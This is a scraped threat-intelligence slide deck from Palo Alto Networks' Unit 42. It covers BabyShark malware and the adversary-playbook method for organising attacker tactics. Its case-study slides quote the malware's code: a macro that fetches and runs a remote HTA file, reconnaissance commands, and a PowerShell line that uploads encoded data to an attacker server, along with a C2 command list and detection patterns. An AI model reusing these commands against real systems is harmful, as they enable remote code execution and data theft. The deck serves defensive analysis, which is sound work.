Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

The adversary playbook - the tools, techniques and procedures used by threat actors

192 views

Published on

A presentation at the Jisc security conference 2019 by Alex Hinchcliffe, threat intelligence analyst, Palo Alto Networks.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

The adversary playbook - the tools, techniques and procedures used by threat actors

  1. 1. Unit 42 Adversary Playbooks Alex Hinchliffe Threat Intelligence Analyst
  2. 2. Agenda • Introductions • Information sharing partnerships • Case study: BabyShark • Adversary Playbooks
  3. 3. LIFE THE UNIVERSE EVERYTHING
  4. 4. OUR MISSION ANALYZE THE DATA AVAILABLE TO PALO ALTO NETWORKS TO IDENTIFY ADVERSARIES, THEIR MOTIVATIONS, RESOURCES, AND TACTICS TO BETTER UNDERSTAND THE THREATS OUR CUSTOMERS FACE https://unit42.paloaltonetworks.com @Unit42_Intel
  5. 5. Cyber Threat Alliance Charter Members: Affiliate Members: Contributing Members: 1. To share threat information in order to improve defenses against advanced cyber adversaries across member organizations and their customers. 2. To advance the cybersecurity of critical information technology infrastructures. 3. To increase the security, availability, integrity and efficiency of information systems.
  6. 6. Mission… “Foster relationships with SOC, IR and CERT teams from customers, partners and organisations in EMEA to collaborate and share threat information.” 60+ Members… Threat Information Sharing Program (TISP)
  7. 7. Case Study: BabyShark
  8. 8. BabyShark “Top Trumps” Language VBS Debut year 2018 Key Interests Universities and Think-tanks Hobbies Espionage (related to nuclear security and Korean peninsula) Best friends KimJongRAT and STOLEN PENCIL Works for Kimsuky Group (aka Velvet Chollima, THALLIUM, Nickel Foxcroft) Special powers Cryptocurrency mining Family members 4
  9. 9. ATTACK LIFE CYCLE RECON WEAPONIZATION DELIVERY INSTALLATION EXPLOITATIO N COMMAND & CONTROL OBJECTIVE
  10. 10. WEAPONIZATION Excel Macro-Enabled Add-In file “Hamre-re-NK-deterrence-CWIR-19-Nov18.xlam”
  11. 11. DELIVERY
  12. 12. Sub AutoOpen() Shell (“mshta https://tdalpacafarm[.]com/files/kr/contents/Vkggy0.hta”) End Sub EXPLOITATIO N
  13. 13. HKCUSoftwareMicrosoftOffice14.0ExcelSecurityVBAWarnings , value:1 whoami hostname ipconfig /all net user dir “%programfiles%”; “%programfiles% (x86)”; ……... tasklist ver set reg query “HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault” INSTALLATION
  14. 14. COMMAND & CONTROL retu=wShell.run(“certutil -f -encode “””&ttmp&””” “””&ttmp1&””””,0,true) retu=wShell.run(“powershell.exe (New-Object System.Net.WebClient).UploadFile(‘https://tdalpacafarm [.]com/files/kr/contents/upload.php’,'”&ttmp1&”‘);del “””&ttmp1&”””;del “””&ttmp&””””,0,true)
  15. 15. • Espionage related to nuclear security; • Espionage related to Korean peninsula’s national security issues; • Financial gain with focus on the cryptocurrency OBJECTIVE Command Name Description getfiles Archive all files in the BabyShark base path as a ZIP archive, then upload to the C2 exe_down Download further payloads redirect_vbs Possible C2 path change
  16. 16. OBJECTIVE Command Name Description keyhook Start key loggers implemented using PowerShell (available on GitHub) or custom C# dir list Collect host information using: whoami, hostname, ipconfig, net user, arp -a, dir (various), vol and tasklist power com Load DLL component exe del Clean up all files associated with secondary payload execution execute Execute payloads
  17. 17. Adversary Playbooks
  18. 18. ADVERSARY PLAYBOOK CONCEPT An Adversary's Playbook is the organized collection of the Techniques, Tactics and Procedures (TTP) they employ when launching cyber-attacks. As adversaries do not share their playbooks with defenders, we must derive them through observations of live attacks, shared information and intelligence analysis.
  19. 19. Deconstructing the Attack Life Cycle COMMAND & CONTROL Custom Command and Control Fallback Channels Data Encoding
  20. 20. 2.0
  21. 21. STIX 2.0 Structured Threat Information Expression (STIX™) is a language and serialization format used to exchange cyber threat intelligence ATT&CK MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) is a curated knowledge base and model for cyber adversary behavior A linear, phase- based process an adversary must complete to successfully execute an attack STIX 2.0ATT&CK ATTACK LIFE CYCLE PLAYBOOKS A method of organizing tactics, tools, and procedures adversaries used in a structured data format ATTACK LIFECYCLE
  22. 22. ADVERSARY ATTACK LIFE CYCLE IDENTIFIED TACTICS INDICATORS PLAYBOOK PLAYS ATT&CK
  23. 23. Identify business relationships RECON
  24. 24. Obfuscate or encrypt code PowerShell Scripting mshta Hidden Files and Directories Logon Scripts windows-registry-key:key = 'HKCUSoftwareMicrosoftCommand ProcessorAutoRun' AND windows-registry-key:values[*].data LIKE '%powershell.exe%mshta%.hta%' INSTALLATION
  25. 25. Standard Application Layer Protocol Data Encoding Remote File Copy BabyShark uses HTTPS for C2 domain-name:value = 'tdalpacafarm[.]com' COMMAND & CONTROL
  26. 26. Campaign 1 Recon Weaponize Delivery Exploit Install C2 Act on Obj. Identify business relationships Acquire OSINT data sets and information Obtain templates/branding materials Acquire and/or use 3rd party infrastructure services Remote access tool development Install and configure hardware, network, and systems Obfuscate or encrypt code Obtain/re-use payloads Buy domain name Create custom payloads Conduct social engineering or HUMINT operation Spear phishing messages with malicious attachments Authorized user performs requested cyber action Hidden Files and Directories Process Injection Rundll32 Software Packing Scripting Remote File Copy Data Encoding Standard Application Layer Protocol Process Discovery Automated Collection Screen Capture Clipboard Data System Network Configuration Discovery File and Directory Discovery Logon Scripts Host-based hiding techniques Misattributable credentials Obtain/re-use payloads Buy domain name Create custom payloads Spear phishing messages with malicious attachments Authorized user performs requested cyber action Confirmation of launched compromise achieved Custom Cryptographic Protocol Standard Application Layer Protocol Commonly Used Port System Information Discovery Campaign 2
  27. 27. Campaign 1 Recon Weaponize Delivery Exploit Install C2 Act on Obj. Identify business relationships Acquire OSINT data sets and information Obtain templates/branding materials Acquire and/or use 3rd party infrastructure services Remote access tool development Install and configure hardware, network, and systems Obfuscate or encrypt code Obtain/re-use payloads Buy domain name Create custom payloads Conduct social engineering or HUMINT operation Spear phishing messages with malicious attachments Authorized user performs requested cyber action Hidden Files and Directories Process Injection Rundll32 Software Packing Scripting Remote File Copy Data Encoding Standard Application Layer Protocol Process Discovery Automated Collection Screen Capture Clipboard Data System Network Configuration Discovery File and Directory Discovery Logon Scripts Host-based hiding techniques Misattributable credentials Obtain/re-use payloads Buy domain name Create custom payloads Spear phishing messages with malicious attachments Authorized user performs requested cyber action Confirmation of launched compromise achieved Custom Cryptographic Protocol Standard Application Layer Protocol Commonly Used Port System Information Discovery Campaign 2
  28. 28. How should people use this? Simulations Ranges Defence Evaluations Cyber Threat Alliance
  29. 29. Defence #1 Defence #2 Defence #3 Defence Priorities Your Top 10 Adversaries Distinct TTPs Defences
  30. 30. https://pan-unit42.github.io/playbook_viewer/
  31. 31. THANK YOU unit42.paloaltonetworks.com Twitter: @AlexHinchliffe, @Unit42_Intel

×